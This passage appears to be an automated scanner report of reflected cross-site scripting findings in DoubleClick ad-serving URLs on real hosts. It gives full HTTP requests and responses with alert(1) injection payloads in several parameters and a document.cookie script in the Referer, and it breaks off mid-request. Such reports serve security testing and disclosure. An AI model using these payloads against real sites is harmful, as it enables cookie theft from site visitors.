GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=074214'-alert(1)-'6b515b85808&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('\n\n\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=074214'-alert(1)-'6b515b85808&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw
...[SNIP]...

3.9. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 168dc"-alert(1)-"4bc3c012150 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw168dc"-alert(1)-"4bc3c012150&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('\n\n\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw168dc"-alert(1)-"4bc3c012150&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/");

var fscUrl = url;

var fscUrl
...[SNIP]...

3.10. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d096f'-alert(1)-'c9bc2352f53 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzwd096f'-alert(1)-'c9bc2352f53&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('\n\n\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzwd096f'-alert(1)-'c9bc2352f53&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/\">
...[SNIP]...

3.11. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad9d5'-alert(1)-'414f1c46651 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=Lad9d5'-alert(1)-'414f1c46651&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('\n\n\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/210/%2a/m%3B239990545%3B0-0%3B0%3B62878001%3B4307-300/250%3B41692150/41709937/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=Lad9d5'-alert(1)-'414f1c46651&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.12. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25d83"-alert(1)-"24bc777dba0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L25d83"-alert(1)-"24bc777dba0&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('\n\n\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/210/%2a/m%3B239990545%3B0-0%3B0%3B62878001%3B4307-300/250%3B41692150/41709937/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L25d83"-alert(1)-"24bc777dba0&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.13. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.metacafecom/B5470558.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb8d6"-alert(1)-"3bdf7305698 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=cb8d6"-alert(1)-"3bdf7305698 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7545
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:50:46 GMT
Expires: Mon, 16 May 2011 12:50:46 GMT

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=cb8d6"-alert(1)-"3bdf7305698http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1bxx_pain");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

3.14. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.metacafecom/B5470558.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be027'-alert(1)-'aa4739289b5 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=be027'-alert(1)-'aa4739289b5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7537
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:50:51 GMT
Expires: Mon, 16 May 2011 12:50:51 GMT

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=be027'-alert(1)-'aa4739289b5http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap \">
...[SNIP]...

3.15. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.metacafecom/B5470558.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b114"-alert(1)-"668a0f0874f was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ5b114"-alert(1)-"668a0f0874f&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7548

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ5b114"-alert(1)-"668a0f0874f&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_line ");
var fscUrl = url;
var fscUrlClickTagFound = fal
...[SNIP]...

3.16. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.metacafecom/B5470558.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af04c'-alert(1)-'43db30c6c8d was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQaf04c'-alert(1)-'43db30c6c8d&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7543

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQaf04c'-alert(1)-'43db30c6c8d&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap \">
...[SNIP]...

3.17. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.metacafecom/B5470558.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afef5"-alert(1)-"7664da328bf was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313afef5"-alert(1)-"7664da328bf&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
